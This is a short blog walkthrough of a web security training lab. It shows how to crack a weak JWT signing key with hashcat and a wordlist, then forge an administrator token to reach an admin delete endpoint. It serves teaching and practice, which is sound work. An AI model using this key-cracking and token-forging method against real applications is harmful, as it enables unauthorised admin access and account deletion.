Open in app

Sign in

Write

Sign in

22.3 Lab: JWT authentication bypass via weak signing key

This lab uses a JWT-based mechanism for handling sessions. It uses an extremely weak secret key to both sign and verify tokens. This can be easily brute-forced using a wordlist of common secrets. To solve the lab, first brute-force the website’s secret key. Once you’ve obtained this, use it to sign a modified session token that gives you access to the admin panel at /admin, then delete the user carlos | Karthikeyan Nagaraj

Karthikeyan Nagaraj
2 min readMay 17, 2024

Description

This lab uses a JWT-based mechanism for handling sessions. It uses an extremely weak secret key to both sign and verify tokens. This can be easily brute-forced using a wordlist of common secrets.

To solve the lab, first brute-force the website’s secret key. Once you’ve obtained this, use it to sign a modified session token that gives you access to the admin panel at /admin, then delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

Tip

We recommend familiarizing yourself with how to work with JWTs in Burp Suite before attempting this lab.

We also recommend using hashcat to brute-force the secret key. For details on how to do this, see Brute forcing secret keys using hashcat.

Solution

Part 1 — Brute-force the secret key

  1. Turn on Proxy on the browser and turn off the Intercept in Burp and move to http history.
  2. Log in to your account.
  3. Send the GET /my-account?id=wiener request to the repeater.
  4. Copy the JWT session cookie, open a terminal, and paste the following command which incorporates hashcat to crack the secret key.
    hashcat -a 0 -m 16500 “JWT_COOKIE” /usr/share/seclists/Passwords/scraped-JWT-secrets.txt
  5. If everything works correctly, this should reveal that the weak secret is secret1.

Part 2— Modify and sign the JWT

  1. Go to https://jwt.io and paste the JWT cookie that we copied from the repeater.
  2. In the Payload box, change the value of the sub from wiener to administrator
  3. In the Verify-Signature box, paste the key secret1 or any other key that you cracked from hashcat in “your-256-bit-secret”.
  4. Now, copy the final JWT cookie on the left and go to the repeater.
  5. Change the path to /admin/delete?username=carlos and replace the JWT cookie with the one that we copied from jwt.io
  6. Send the request and the Lab will be solved.

A YouTube Channel for Cybersecurity Lab’s Poc and Write-ups

Cyberw1ng

Learn Cyber Security and Create Awareness ~ cyberwing Stay tuned with me, Subscribe, and Like the Videos… Ask Doubts…

www.youtube.com

Telegram Channel for Free Ethical Hacking Dumps

Ethical Hacking Dumps — CEH, OSCP, Comptia

Materials and Books for Ethical Hacking Exams like CEH v12, OSCP, Comptia Pentest+, Comptia Security+, Comptia Network+…

t.me

Thank you for Reading!

Happy Ethical Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng

Cybersecurity
Careers
Hacking
Bug Bounty
Penetration Testing

--

--

Karthikeyan Nagaraj

Written by Karthikeyan Nagaraj

8.3K Followers

Security Researcher | Bug Hunter | Web Pentester | CTF Player | TryHackme Top 1% | AI Researcher | Blockchain Developer

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams